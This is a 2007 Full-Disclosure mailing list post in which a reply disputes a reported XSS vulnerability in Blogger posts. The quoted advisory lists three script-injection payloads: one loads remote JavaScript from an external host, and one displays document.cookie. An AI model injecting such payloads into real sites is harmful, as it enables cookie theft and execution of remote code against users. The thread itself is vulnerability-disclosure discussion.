[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] BLOGGER XSS VULNERABILITY

To: Daniele Costa <info@xxxxxxxxxxxx>
Subject: Re: [Full-disclosure] BLOGGER XSS VULNERABILITY
From: Susam Pal <susam@xxxxxxxx>
Date: Sun, 12 Aug 2007 21:41:05 +0530

Why is this a vulnerability? I can't see a way by which an attacker can 
insert JavaScript code into my blog.

 > I've noticed that for any blog hosted at blogspot.com the cookie will
 > be not shown.

The sensitive cookies are not maintained under blogspot.com, so allowing 
JavaScript in blogspot.com doesn't look like a threat or vulnerability.

 > Otherwise, if the blog is located inside your web site, the cookie
 > will be shown.

But I am the only one who is inserting the JavaScript in my blog. So, 
I'll end up stealing the cookies set for my domain. Why would I steal 
cookies set for my domain? I already know them because it is my website.

Regards,
Susam Pal
http://susam.in/

Daniele Costa wrote, On Saturday 11 August 2007 10:52 PM:
> ------------------------------------------------------
> BLOGGER XSS VULNERABILITY
> ------------------------------------------------------
> 
> Blogspot.com
> 
> Homepage: http://www.blogspot.com
> 
> and
> 
> Blogger.com
> 
> Homepage: http://www.blogger.com
> 
> Affected files:
> 
> Post's Input boxes
> 
> ------------------------------------------------------
> XSS DETAILS
> ------------------------------------------------------
> XSS vuln via injecting javascript code into any post.
> 
> Blogger doesn't sanitize user input during post process.
> Try injecting the following code into a post
> 
> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
> 
> or just the well known
> 
> <SCRIPT>alert(document.cookie);</SCRIPT>
> 
> or
> 
> <SCRIPT >alert(document.domain);</SCRIPT>
> 

<!-- COPIED IN REPLY -->

> 
> ------------------------------------------------------
> Proof Of Concept
> ------------------------------------------------------
> 
> http://pocasiculezza.blogspot.com/
> 
> -----------------------------------------------------
> HISTORY
> ------------------------------------------------------
> Discovered : 07/11/2007 by Daniele Costa
> Published : 07/11/2007 by Daniele Costa
> 
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] BLOGGER XSS VULNERABILITY
  - From: Valdis . Kletnieks

References:
- [Full-disclosure] BLOGGER XSS VULNERABILITY
  - From: Daniele Costa

Prev by Date: [Full-disclosure] Thomas Schulte/HV/RCG/DE ist außer Haus.
Next by Date: Re: [Full-disclosure] DEFCON 15 and Blackhat 2007 presentations iso CDs ?
Previous by thread: [Full-disclosure] BLOGGER XSS VULNERABILITY
Next by thread: Re: [Full-disclosure] BLOGGER XSS VULNERABILITY
Index(es):
- Date
- Thread